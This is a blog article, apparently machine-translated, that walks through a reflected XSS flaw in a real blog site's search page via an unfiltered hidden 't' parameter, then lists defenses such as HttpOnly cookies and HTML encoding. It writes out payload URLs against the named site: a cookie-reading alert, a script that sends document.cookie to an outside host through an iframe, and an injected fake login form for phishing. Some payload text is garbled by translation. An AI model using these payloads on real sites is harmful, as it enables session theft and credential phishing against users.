Give me a pair of angle brackets and I can create the entire Internet.

This is an article about XSS attacks. A while ago, I saw an article about XSS vulnerabilities in the blog community. I studied it and found that the vulnerability was still found three months later, I don't know why.

Vulnerability Analysis

You can use the search function to find and view it. The search function transmits two parameter names "w" and "t" to the url. The input box corresponds to "w ", the search category corresponds to "t ". If the t parameter is not visible, click the category link in the search box.

According to common sense, the input box is the most vulnerable to attacks, so it is also protected when you look for it. According to my tests, there are at least two protection measures:

1. The regular expression matches and deletes the section where the string contains "<script> </script>.
2. The server limits the length of the input string.

Although the method is not perfect, adding the two together can indeed achieve the purpose of protection. The parameter "w" is safe, but the parameter "t" does not have any protection measures. Therefore, the vulnerability is here.

By analyzing the code, we can see that the last "t" is passed to a hidden form. The Code is as follows:

<input type="hidden" class="txtSeach" name="t" id="t" value="">

You can input any content as you like. For example, input 'test "/> <input type =" den "and the final result is:

<input type="hidden" class="txtSeach" name="t" id="t" value="Test"/><input type="hidden"/>

Let's take a look at the article, and basically understand how to conduct js script attacks against this vulnerability, such:

One of the dangers of XSS-Cookie Theft

What XSS can do is not just pop-up window, but all js users know that the cookie information can be obtained through document. cookie. To test the information, we can use alert to display it. Write the url as follows:

http://zzk.cnblogs.com/s?w=hacker&t=a"/><script>alert(document.cookie)</script><input type="hidden

Enter the URL and the cookie value is displayed in a pop-up window, for example:

In general, Cookie Stealing is relatively confidential, so that users are not aware of it. The general practice is to construct a hidden iframe, and then pass the cookie value as a parameter along with the iframe to the URL specified by the attacker. For example, if we pass the cookie to the Baidu site, you can enter the following url:

Http://zzk.cnblogs.com? W = hacker & t = a "/> <iframe id =" myid "> </iframe> <script> var frame = document. getElementById ("myid"); frame. src = "http://www.baidu.com /? A = "% 2Bdocument. cookie; </script> <input type =" hidden

To show the effect, We do not hide iframe. You can see the following:

The Fiddler tool shows that the cookie has been sent out. Once the iframe is hidden, the user clicks the link and basically cannot detect the cookie being stolen.

The most useful cookie in the blog garden is the ". dottextCookie: Once the cookie is stolen, the other party can directly log on to your account through cookie authentication (for example, using Firecookie plug-in of Firefox to edit the cookie ).

However, I found that the cookie was never obtained, and later I found that the cookie was identified as HttpOnly, which made it impossible to obtain it through the js script on the page.

As a result, although the search function has a vulnerability, it cannot steal useful cookie values. I think this may also be one of the reasons why the vulnerability has not been processed.

XSS hazard 2-spoofing Html elements and deceiving users

Although HttpOnly is a powerful tool to prevent cookie Theft, it does not mean that the Xss vulnerability can be ignored, because the harm of Xss is not only cookie Theft, but also the ability to forge Html elements and fool users to submit information. For example, enter the following url:

Http://zzk.cnblogs.com? W = hacker & t = a "/> <script> document. getElementById ('searchresult '). innerHTML = "<div> <form> <label> Username: </label> <input type = 'text'/> <br/> <label> Password: </label> <input type = 'text'/> <br/> <input type = 'submit 'value = 'submit'/> </form> </div>"; </script> <input type = "hidden

A login form is forged through the url. for demonstration purposes, I did not add a style, as shown below:

This effect is simple and easy to see through. However, I believe that designing css styles Based on the website style and adding prompt text will produce highly deceptive results, it is easy to attract users to click and hook up with some tempting text or images, because users tend to be relaxed and cautious about the correct page of the domain name. The so-called bullet shoes will always encounter a few dumbys. Therefore, although this XSS attack does not directly steal cookies, it will still cause great harm.

XSS protection measures

Many people commented in my previous article about SQL attacks and asked how to protect them. As a matter of fact, I understand the attack methods and basically know how to protect them. For SQL injection, parameterized queries can be fully competent, and even the same effect can be achieved if you only block single quotes.

For Xss attacks, the protection measures are as follows:

1. The above-mentioned blog garden practices-Regular Expression matching and length restrictions.
2. Set the cookie that does not need to be operated on the client to HttpOnly.
3. Use third-party class libraries, such as AntiXSS.
4. Encode user input in Html format. For example, the MvcHtmlString class in asp.net mvc always encodes the string and then displays it.

There are many and easy methods, but it can truly ensure system security and stability. It is also the root cause of the designers themselves, just like looking for a function to protect the input box, but forgetting to process another parameter, the key lies in whether the concept of protection exists in the mind during the design of each function, and whether or not it is intentional.

Conclusion

Archimedes said, "Give me a lever, and I can raise the whole earth. "In order to express the dangers of XSS, I also imitated this tone and wrote a greeting:" Give me a pair of angle brackets and I can create the entire Internet. "